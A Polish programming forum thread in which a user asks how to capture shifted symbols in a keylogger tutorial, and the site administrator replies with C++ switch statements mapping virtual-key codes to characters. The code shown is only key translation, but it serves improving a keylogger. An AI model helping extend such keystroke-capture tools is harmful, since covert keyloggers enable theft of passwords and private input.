CYFROWY BARON • PROGRAMOWANIE • Zobacz wątek - Problem z keyloggerem opisanym przez CyfrowegoBarona

Problem z keyloggerem opisanym przez CyfrowegoBarona

dział ogólny

Problem z keyloggerem opisanym przez CyfrowegoBarona

Nowy postprzez loleslaw » środa, 25 stycznia 2017, 22:48

Witam
tak jak w temacie mam problem z uzyskaniem znaków !@#$%^&*(). Próbuję i kombinuję i nic mi nie wychodzi.
Mógłby ktoś podpowiedzieć w którym miejscu w kodzie trzeba dokonać zmian.
Avatar użytkownika
loleslaw
Bladawiec
Bladawiec
 
Posty: 3
Dołączył(a): niedziela, 11 grudnia 2016, 16:33
Podziękował : 0
Otrzymał podziękowań: 0
System operacyjny: Windows 7
Kompilator: Borland C++ Builder 6
Gadu Gadu: 0
    Windows 7Chrome

Re: Problem z keyloggerem opisanym przez CyfrowegoBarona

Nowy postprzez Cyfrowy Baron » sobota, 28 stycznia 2017, 20:21

Masz tam taki kod:

KOD cpp:     UKRYJ  
if(vKey >= 186 && vKey <= 222)
   {
    switch(vKey)
    {
     case 186: if(!bShift) ch = ';';  else ch = ':';   break;
     case 187: if(!bShift) ch = '=';  else ch = '+';   break;
     case 188: if(!bShift) ch = ',';  else ch = '<';   break;
     case 189: if(!bShift) ch = '-';  else ch = '_';   break;
     case 190: if(!bShift) ch = '.';  else ch = '>';   break;
     case 191: if(!bShift) ch = '/';  else ch = '?';   break;
     case 192: if(!bShift) ch = '`';  else ch = '~';   break;
     case 219: if(!bShift) ch = '[';  else ch = '{';   break;
     case 220: if(!bShift) ch = '\\'; else ch = '?';   break;
     case 221: if(!bShift) ch = ']';  else ch = '}';   break;
     case 222: if(!bShift) ch = '\''; else ch = '\"';  break;
     default: ch = 'n'; break;
    }


Musisz go rozszerzyć o kolejne znaki:

KOD text:     UKRYJ  
!  49
@  50
#   51
$   52
%   53
^   54
&   55
*   56
(   57
)   48


czyli dodać kolejny warunek:

KOD cpp:     UKRYJ  
if( vKey >= 48 && vKey <= 57 )
   {
    switch(vKey)
    {
     case 48: if(!bShift) ch = '0';  else ch = ')';   break;
     case 49: if(!bShift) ch = '1';  else ch = '!';   break;
     case 50: if(!bShift) ch = '2';  else ch = '@';   break;
     case 51: if(!bShift) ch = '3';  else ch = '#';   break;
     case 52: if(!bShift) ch = '4';  else ch = '$';   break;
     case 53: if(!bShift) ch = '5';  else ch = '%';   break;
     case 54: if(!bShift) ch = '6';  else ch = '^';   break;
     case 55: if(!bShift) ch = '7';  else ch = '&';   break;
     case 56: if(!bShift) ch = '8'; else ch = '*';   break;
     case 57: if(!bShift) ch = '9';  else ch = '(';   break;
     default: ch = 'n'; break;
    }


Gdybyś rozumiał kod, od razu byś na to wpadł.
Avatar użytkownika
Cyfrowy Baron
Administrator
Administrator
 
Posty: 4706
Dołączył(a): niedziela, 13 lipca 2008, 15:17
Podziękował : 12
Otrzymał podziękowań: 440
System operacyjny: Windows 7 x64 SP1
Kompilator: Embarcadero RAD Studio XE2
C++ Builder XE2 Update 4
SKYPE: cyfbar
Gadu Gadu: 0
    Windows 7Firefox


  • Podobne tematy
    Odpowiedzi
    Wyświetlone
    Ostatni post

Powrót do Ogólne problemy z programowaniem

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zalogowanych użytkowników i 1 gość

cron